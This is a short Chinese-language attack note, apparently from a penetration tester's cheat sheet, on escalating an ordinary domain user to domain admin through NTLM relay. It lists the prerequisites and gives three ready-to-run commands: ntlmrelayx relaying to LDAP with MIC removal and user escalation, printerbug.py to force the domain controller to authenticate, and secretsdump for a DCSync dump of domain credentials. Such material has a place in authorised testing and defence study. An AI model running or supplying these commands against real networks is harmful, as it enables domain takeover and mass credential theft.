• 效果
      NTLM中间人是被动触发,等待通段下主机访问其他主机时进行劫持。而这个漏洞可以让域控主动请求我们。
      普通域用户提升为管理员。
      安装impacket包
    • 条件
      普通域用户账号密码
      exchange服务
    • 操作

    中继

    1. ntlmrelayx.py --remove-mic --escalate-user ddh -t ldap://WIN-J341S97EGGH.tt.com -smb2support -debug

    触发

    1. python3 printerbug.py tt.com/ddh@WIN-J341S97EGGH.tt.com 192.168.19.8

    DCSync

    1. secretsdump.py tt.com/ddh@WIN-J341S97EGGH.tt.com -just-dc